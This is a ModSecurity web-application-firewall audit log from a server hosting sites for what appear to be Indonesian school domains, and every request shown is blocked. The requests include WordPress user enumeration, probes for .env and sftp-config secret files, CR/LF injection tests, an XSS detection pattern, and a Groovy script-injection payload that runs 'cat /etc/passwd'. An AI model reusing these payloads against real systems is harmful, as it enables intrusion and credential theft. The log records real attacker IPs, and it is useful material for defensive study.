--c3d1a752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3d1a752-E-- --c3d1a752-H-- Message: Access denied with code 403 (phase 2). Pattern match "alert(document.domain)"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748767367454591 2043 (- - -) Stopwatch2: 1748767367454591 2043; combined=1013, p1=353, p2=633, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3d1a752-Z-- --46160549-A-- [01/Jun/2025:16:03:52 +0700] aDwXeO4LjVe0Eerk_ZavDgAAAFQ 103.236.140.4 53218 103.236.140.4 8181 --46160549-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.40.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.40.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46160549-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46160549-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748768632914896 3360 (- - -) Stopwatch2: 1748768632914896 3360; combined=1442, p1=491, p2=915, p3=0, p4=0, p5=35, sr=98, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46160549-Z-- --27544421-A-- [01/Jun/2025:16:07:12 +0700] aDwYQEaTRmdfB-FaJjnhTgAAABU 103.236.140.4 53266 103.236.140.4 8181 --27544421-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.210.137 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.210.137 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --27544421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27544421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748768832556632 735 (- - -) Stopwatch2: 1748768832556632 735; combined=322, p1=280, p2=0, p3=0, p4=0, p5=41, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27544421-Z-- --f82a2c30-A-- [01/Jun/2025:16:14:50 +0700] aDwaCgQHT18O7PnXxsQymQAAAJQ 103.236.140.4 53302 103.236.140.4 8181 --f82a2c30-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 95.215.65.104 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 95.215.65.104 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f82a2c30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f82a2c30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748769290436368 3409 (- - -) Stopwatch2: 1748769290436368 3409; combined=1388, p1=468, p2=890, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f82a2c30-Z-- --86832860-A-- [01/Jun/2025:16:29:47 +0700] aDwdi-4LjVe0Eerk_ZavJQAAAEg 103.236.140.4 53370 103.236.140.4 8181 --86832860-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --86832860-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86832860-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748770187419358 825 (- - -) Stopwatch2: 1748770187419358 825; combined=321, p1=278, p2=0, p3=0, p4=0, p5=42, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86832860-Z-- --b4ae5b7f-A-- [01/Jun/2025:17:09:02 +0700] aDwmvgQHT18O7PnXxsQy9gAAAIA 103.236.140.4 55050 103.236.140.4 8181 --b4ae5b7f-B-- POST /website/blog/ HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 22 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114 Cookie: X-Varnish: 170113681 --b4ae5b7f-C-- { "name": "test" } --b4ae5b7f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4ae5b7f-E-- --b4ae5b7f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(\\n|\\r)" at ARGS_NAMES:{\r\n "name": "test"\r\n}. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "145"] [id "217291"] [rev "2"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d found within ARGS_NAMES:{\x5cr\x5cn \x22name\x22: \x22test\x22\x5cr\x5cn}: {\x0d\x0a \x22name\x22: \x22test\x22\x0d\x0a}"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772542594796 5288 (- - -) Stopwatch2: 1748772542594796 5288; combined=2924, p1=727, p2=2163, p3=0, p4=0, p5=33, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4ae5b7f-Z-- --93e6aa10-A-- [01/Jun/2025:17:09:02 +0700] aDwmvu4LjVe0Eerk_ZawBgAAAFU 103.236.140.4 55058 103.236.140.4 8181 --93e6aa10-B-- POST /_search HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 169 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 198.252.110.114 Cookie: X-Varnish: 170113684 --93e6aa10-C-- {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} --93e6aa10-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93e6aa10-E-- --93e6aa10-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772542661586 2224 (- - -) Stopwatch2: 1748772542661586 2224; combined=798, p1=471, p2=292, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93e6aa10-Z-- --89888024-A-- [01/Jun/2025:17:15:45 +0700] aDwoUQQHT18O7PnXxsQ5_wAAAIA 103.236.140.4 46570 103.236.140.4 8181 --89888024-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.117.232.212 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.117.232.212 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --89888024-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89888024-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772945603187 4033 (- - -) Stopwatch2: 1748772945603187 4033; combined=2252, p1=697, p2=1520, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89888024-Z-- --d367ab3f-A-- [01/Jun/2025:17:16:18 +0700] aDwockaTRmdfB-FaJjnm8gAAAA8 103.236.140.4 48256 103.236.140.4 8181 --d367ab3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 91.144.45.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.144.45.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d367ab3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d367ab3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748772978897965 3797 (- - -) Stopwatch2: 1748772978897965 3797; combined=1819, p1=549, p2=1237, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d367ab3f-Z-- --9f2f3615-A-- [01/Jun/2025:17:18:59 +0700] aDwpE-4LjVe0Eerk_Za18AAAAFQ 103.236.140.4 56002 103.236.140.4 8181 --9f2f3615-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 --9f2f3615-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f2f3615-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748773139725941 1796 (- - -) Stopwatch2: 1748773139725941 1796; combined=1068, p1=977, p2=0, p3=0, p4=0, p5=91, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f2f3615-Z-- --a6d2e634-A-- [01/Jun/2025:18:07:28 +0700] aDw0cO4LjVe0Eerk_Za_5AAAAEI 103.236.140.4 41684 103.236.140.4 8181 --a6d2e634-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.26.90.247 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.26.90.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* --a6d2e634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6d2e634-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748776048279496 794 (- - -) Stopwatch2: 1748776048279496 794; combined=336, p1=294, p2=0, p3=0, p4=0, p5=42, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6d2e634-Z-- --c3942102-A-- [01/Jun/2025:18:14:47 +0700] aDw2JwQHT18O7PnXxsRFbgAAAIE 103.236.140.4 41744 103.236.140.4 8181 --c3942102-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 203.146.45.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.146.45.76 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 --c3942102-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3942102-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748776487980552 905 (- - -) Stopwatch2: 1748776487980552 905; combined=334, p1=292, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3942102-Z-- --0422f131-A-- [01/Jun/2025:18:14:50 +0700] aDw2KgQHT18O7PnXxsRFcwAAAI8 103.236.140.4 41754 103.236.140.4 8181 --0422f131-B-- GET /.vscode/sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 203.146.45.76 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.146.45.76 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 11; Redmi Note 9 Pro Build/RKQ1.200826.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/90.0.4430.210 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 --0422f131-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0422f131-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748776490362844 741 (- - -) Stopwatch2: 1748776490362844 741; combined=303, p1=271, p2=0, p3=0, p4=0, p5=32, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0422f131-Z-- --231aa06c-A-- [01/Jun/2025:18:31:25 +0700] aDw6DQQHT18O7PnXxsRFiQAAAIU 103.236.140.4 41920 103.236.140.4 8181 --231aa06c-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36 Accept-Charset: utf-8 --231aa06c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --231aa06c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748777485557946 852 (- - -) Stopwatch2: 1748777485557946 852; combined=352, p1=312, p2=0, p3=0, p4=0, p5=40, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --231aa06c-Z-- --5704df42-A-- [01/Jun/2025:18:43:28 +0700] aDw84AQHT18O7PnXxsRFjgAAAJA 103.236.140.4 42042 103.236.140.4 8181 --5704df42-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept-Charset: utf-8 --5704df42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5704df42-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748778208772597 800 (- - -) Stopwatch2: 1748778208772597 800; combined=320, p1=281, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5704df42-Z-- --4254b02b-A-- [01/Jun/2025:18:58:18 +0700] aDxAWgQHT18O7PnXxsRFoQAAAIA 103.236.140.4 42424 103.236.140.4 8181 --4254b02b-B-- POST /website/blog/ HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 22 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded --4254b02b-C-- { "name": "test" } --4254b02b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4254b02b-E-- --4254b02b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(\\n|\\r)" at ARGS_NAMES:{\r\n "name": "test"\r\n}. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "145"] [id "217291"] [rev "2"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d found within ARGS_NAMES:{\x5cr\x5cn \x22name\x22: \x22test\x22\x5cr\x5cn}: {\x0d\x0a \x22name\x22: \x22test\x22\x0d\x0a}"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748779098732151 3087 (- - -) Stopwatch2: 1748779098732151 3087; combined=1856, p1=419, p2=1410, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4254b02b-Z-- --b84d9803-A-- [01/Jun/2025:18:58:18 +0700] aDxAWu4LjVe0Eerk_ZbAXQAAAEE 103.236.140.4 42426 103.236.140.4 8181 --b84d9803-B-- POST /_search HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 169 User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3.1 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded --b84d9803-C-- {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} --b84d9803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b84d9803-E-- --b84d9803-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /_search"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748779098795896 1613 (- - -) Stopwatch2: 1748779098795896 1613; combined=595, p1=410, p2=158, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b84d9803-Z-- --f551cb14-A-- [01/Jun/2025:19:06:30 +0700] aDxCRu4LjVe0Eerk_ZbAbAAAAFY 103.236.140.4 42490 103.236.140.4 8181 --f551cb14-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.37.205.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.37.205.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f551cb14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f551cb14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 